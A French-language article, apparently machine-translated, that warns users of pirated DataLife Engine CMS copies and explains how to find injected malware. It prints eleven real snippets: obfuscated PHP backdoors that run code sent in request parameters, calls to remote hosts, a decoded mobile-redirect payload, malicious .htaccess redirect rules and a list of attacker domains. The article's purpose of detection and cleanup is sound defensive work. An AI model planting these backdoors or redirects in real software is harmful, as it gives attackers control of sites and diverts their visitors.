Virus dans le système DataLife Engine

Dédié aux fans de versions piratées gratuites de DLE. Lorsque vous téléchargez le CMS DLE sur des ressources tierces, préparez-vous au fait qu'un cheval de Troie est déjà installé sur votre système, attendant que vous créez votre projet et que vous y accédiez (au mieux). Dans le pire des cas, il supprimera tout ou fera des redirections secrètes vers d'autres sites (généralement des redirections mobiles de sites en DLE, puisque l'administrateur ne les détecte pas dans 90% des cas, car lui-même est assis depuis un PC ou une tablette).

Alors, comment savoir que votre système DLE a un virus avec une redirection de version mobile ?
L'une des options - vous avez commencé à perdre votre présence. Dès que vous vous en apercevez, nous vous conseillons de prêter attention aux instructions de détection de code malveillant ci-dessous afin d'exclure la possibilité de piratage ou d'infection du site.

Une autre option est lorsque le moteur de recherche lui-même vous avertit que vous avez du code indésirable sur votre site.

Nous souhaitons attirer votre attention sur le fait que du code malveillant peut se trouver dans presque tous les types de fichiers de moteur : . php, .js, .lng, htaccess et même dans des images (souvent des avatars d'utilisateurs). Un tel code peut être sous n'importe quelle forme, il peut être chiffré avec base64_encode, utilisez charet toutes sortes d'astuces qui le rendent difficile à détecter rapidement au moyen d'une recherche automatique. Ou il peut être banal d'être à découvert (cas rares).

Notez qu'il est souvent assez difficile de nettoyer des fichiers (sans savoir ce qui est déplacé ou superflu dans le code moteur). Il est préférable d'utiliser des programmes de comparaison de code, par exemple, si vous avez néanmoins pris la décision et acheté une licence auprès du développeur DLE, vous pouvez vérifier le code de la version sous licence du moteur et le vôtre à l'aide de la vérification des packages à l'aide du programme de vérification de package Beyond Compare. Ainsi, vous pouvez trouver la différence dans le code et trouver votre virus.

Bien sûr, cela n'aidera que si vous n'avez pas modifié votre moteur avec des modules tiers ou utilisé des plugins. Et cela n'aidera certainement pas si le code malveillant se trouve dans les avatars des utilisateurs. Dans les versions actuelles de DLE, la vulnérabilité de chargement des avatars a été corrigée, mais les versions antérieures à DLE 9.8 l'ont. Pour trouver des avatars d'utilisateurs de chevaux de Troie, installez l'antivirus Virusdie sur votre serveur et il trouvera des images qui ne sont pas eux.

Si vous avez été notifié ou que vous avez vous-même remarqué que votre site met du temps à se charger, il redirigera quelque part. Un antivirus ou un moteur de recherche s'est mis à jurer sur votre ressource, pour commencer, il vous suffit de vous rendre sur votre hébergement et de regarder la date à laquelle les fichiers ont été modifiés. Si vous remarquez que des fichiers ont changé récemment, il s'agit souvent de index.php , engine/data/dbconfig.php ,engine/data/config.php , .htaccess , language/Russian/website.lng , qui, en principe, ne devrait pas changer, ou changer uniquement lorsque vous mettez à jour / installez quelque chose, alors avec une forte probabilité, nous pouvons vous plaire - le site est infecté.

N'oubliez pas non plus que le site peut prendre beaucoup de temps à charger car son hébergement est faible, le modèle est plein de scripts et non optimisé, et diverses raisons similaires. Mais c'est mieux d'être en sécurité, non ?

Code malveillant dans la plupart des moteurs téléchargés à partir de sites tiers

Vous trouverez ci-dessous des exemples de code malveillant injecté, dans la plupart des distributions DLE téléchargées à partir de sites tiers. Le code peut ne pas correspondre. Par conséquent, il est recommandé de rechercher non pas par correspondance complète, mais par correspondance partielle.

1. Présence de code malveillant dans engine/inc/addnews.php:

$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false)) 
 {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."13."."1_".$serv;};

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

2. Les fichiers malveillants avec la vulnérabilité engine/classes/min/lib/JSMinify.php et engine/ajax/js.php , qui ne sont pas inclus dans la distribution du système.

3. Dans l'antivirus intégré engine/classes/antivirus.class.php , ces fichiers très malveillants - engine/classes/min/lib/JSMinify.php et engine/ajax/js.php sont exclus de l'analyse .

4. La présence d'exceptions qui ouvrent la voie à un fichier avec une vulnérabilité engine/classes/min/.htaccess:

<Files "JSMinify.php">
 Order Deny,Allow
 Allow from all
</files>
<Files "JSMin.php">
 Order Deny,Allow
 Allow from all
</files>

5. Présence de code malveillant dans engine/modules/calendar.php:

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

6. Présence de code malveillant dans engine/modules/feedback.php:

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false)) 
   {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTEzLjFf').$sert);}

$captchascrypt='bas'.'e64_'.'dec'.'ode';

$home_url = $_SERVER['HTT'.'P_H'.'OST'];
			if ((!strpos($home_url, '127.'.'0.')) and (strpos($home_url, '.'))) 
			{$captis = 'f'.'ile';@$captis($captchascrypt('aHR0cHM6Ly9kbGUtaW5mby5jYy9qcy5waHA/bGljZW5zZT0xNS4xX25f').$home_url);}

7. Présence de code malveillant dans engine/modules/functions.php:

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

$news_num = @$_REQUEST['numer'];

$bannermass = @$_REQUEST['bannerid'];

$check_newsnum = @$_REQUEST['newsnum'];

$check_category = @$_REQUEST['category'];

$get_url_var = '77067560';

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

if($bannermass==$get_url_var){
   if (@strpos($check_newsnum, 'creat')=== false){
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings

8. Présence de code malveillant dans engine/data/dbconfig.php:

$config['description'].='" />'."
".'<script type="text/javascript" src="http://up.bot.nu/go/'.rand(0,999).'"></script>'."
".'<meta http-equiv="Pragma" content="no-cache';

$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eNqlVG1v2jAQ/itFQnWiskAhvBVF21qhrdq0bpSumlpkOcmReJA4s51SNPPfdw5oXSvKl32Iz76753zP+XL1UEJAKDnyCFWgrFRc5NXZLjwmIz53uFKgnTq9uLr6dDm+qyNq5rq/36E2EmLBwbGqxnOHk9OG5hk47smgO+z2G6RJ3NEGo70IFARk2Pb7Lb/fJ66Qr1g7/cFB6/CQddAie9IlPX/YbvmDbq8z7Pq4DIadVnfg9/xBZ+iTPdnXJcyDOr0eT76PJ3dKSwkPDgotyqIA6RAuS6oVlL9A4o2zUT0V6iBAK5HSQut06y4Ph5eACYB8AqTAYjTsXEnnLU8ir8i0fbum4qlu2t0igjSqVFHkWZlIYcWbzqrSNs+KCqHTo7Nc8GrLKoD4TFwUxwqEtGekj0KyVSmXkEcixlLKeeVSMMky0CCD+/oC1ishY4ThQcFxKYNTxO1hFPxL6Rg5vYhOUq2Ls6alYWuJK7q77ggeuR5t6qVKDpc3h4RRCar8jyLblq39RZCP0+lXeoMn+v7D+MuUzLaN96oZu7DqzVohIaEZ01HqkCayXIK57VxQM15qdpmb2wS0CRmPSxNhAQxnlMkoNSwVwvAkY+YHO5diZVgew6MRIsEAodDmHL+CYx8YloWoyxhfek1OGrY8LjY+Enh2t1h4sjQPCy8S2zDeNqa3he7iSFNqL1xvrxZxLhYmU7kXGZXxtpFh5JlyKRIzZxGEwjMKqnTXNl/PhDxPtklgf1QpPM/hZzsDs85CznKTx1Lw2GQ8LgxIDur+qNcyCq1CmVRH1IiQW2I856bwQiyCwvSKVOTwxBMpOLUXk4rES6AlOlOcZLP9PrtpZk1PrzgZf7sZX0/pzeSSzGrBkf3990yQ3fDp7xsWm83mD0qjwnU=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');

Après avoir déchiffré ce code, vous pouvez voir ce qui suit:

$bre = '_' . '_ses' . 'sion' . '_' . 'id';
if (isset($_COOKIE[$bre])) {
    @setcookie($bre, $_COOKIE[$bre] + 1, time() + 85957, '/');
}
if (($_COOKIE[$bre] == '92470477') or ($_COOKIE[$bre] == '92470378') or ($_COOKIE[$bre] == '92470379') or ($_COOKIE[$bre] == '92470380')) {
    @setcookie($bre, '64920485639546398930584648394', time() + 85957, '/');
    $ref = $_SERVER[strrev(strtoupper('iru_tseuqer')) ];
    $hos = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];
    $rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
    header(strrev('3?igc.pmt' . '/siht/' . 'kcehc' . '/cc.' . 'gro' . '-3w' . '//:pt' . 'th :noi' . 'tac' . 'oL') . '&seor' . 'ef=' . rawurlencode($rf) . '&parameter=\$keyword&se=\$se&ur=1' . strrev(strtoupper('=rerefer_ptth&')) . rawurlencode('http://' . $hos . $ref));
    exit;
}
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
if ((!$_SERVER['HTTP_USER_AGENT']) or ($_SERVER['HTTP_USER_AGENT'] == '') or (!preg_match('/rawle|W3C_|EltaIn|Wget|baidu|curl|ia_arch|ahoo|igma|YaBrow|andex|oogle|bot|Bot|pider|amble|mail./i', $usg))) {
    if (preg_match('/ok.ru|vk.co|oogle.|andex.|mail.r|ambler|ut.by|igma|odnok|msn.c|smi2|rbc.|ulog|facebo.|search|yahoo.|bing./i', $rf)) {
        if ((preg_match('/j2me|ymbian|ndroid|midp|eries\ 60|symbos|htc_|obile|mini|p.browser|phone/i', $usg)) and (!isset($_COOKIE['dle_user_id'])) and (!isset($_COOKIE[$bre])) and ($_SERVER['REQUEST_URI'] != '/')) {
            @setcookie($bre, '92470377', time() + 85957, '/');
        }
    }
}

À partir de ce code, vous pouvez voir qu'il ne fonctionne que sur les appareils mobiles et une seule fois. De plus, il est écrit dans des cookies pour l'utilisateur et n'est plus affiché. Ainsi, beaucoup peuvent penser qu'il s'agissait d'un bug. Eh bien, le script lui-même redirige les utilisateurs d'appareils mobiles vers le site Web w3-org.cc. Qui, à son tour, est utilisé par les attaquants comme site de pose et redirige l'utilisateur vers toute autre adresse finale.

9. Présence de code malveillant dans index.php:

if(preg_match('/'.'('.'a'.'n'.'d'.'r'.'o'.'i'.'d'.'|'.'m'.'i'.'d'.'p'.'|'.'j'.'2'.'m'.'e'.'|'.'s'.'y'.'m'.'b'.'i'.'a'.'n'.'|'.'s'.'e'.'r'.'i'.'e'.'s'.' '.'6'.'0'.'|'.'s'.'y'.'m'.'b'.'o'.'s'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'m'.'o'.'b'.'i'.'l'.'e'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'c'.'e'.'|'.'p'.'p'.'c'.'|'.'s'.'m'.'a'.'r'.'t'.'p'.'h'.'o'.'n'.'e'.'|'.'b'.'l'.'a'.'c'.'k'.'b'.'e'.'r'.'r'.'y'.'|'.'m'.'t'.'k'.'|'.'b'.'a'.'d'.'a'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'p'.'h'.'o'.'n'.'e'.')'.'/'.'i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m"] != '5df9974cf25d22eb3c5aa962d6460477')
{
@setcookie('m', '5df9974cf25d22eb3c5aa962d6460477', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."p"."i"."d"."d"."."."b"."o"."t"."."."n"."u"."/"."s"."/"."1"."1"."8"."0"."5");
die();
}

10. Présence de code malveillant dans index.php , engine/modules/config.php et engine/modules/dbconfig.php:

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

11. La présence de code malveillant dans .htaccess situé dans le répertoire racine:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gsa-crawler|grub-client|gulper|slurp|mihalism|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://stat.pdaupd.net/?23&source=ваш домен [L,R=302] # on

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile}       !^$
RewriteCond %{HTTP_HOST}          !^m\.
RewriteCond %{HTTP:Cookie}        !\smredir=0(;|$)
RewriteRule ^ http://yadirect.ws/ [R,L]

Pour vérifier, après avoir supprimé le virus de tous les fichiers système, vous devez passer d'un appareil mobile avec n'importe quel système d'exploitation (ios, android, etc.) à votre site, s'il n'y a pas de redirection vers la ressource tierce d'un attaquant, alors tout c'est bien.

Sites souvent redirigés vers les versions mobiles de DLE:

w3-org.cc
statuses.ws
live-internet.ws
getinternet.ws
livecountall.ws
googlecount.ws

---

Retour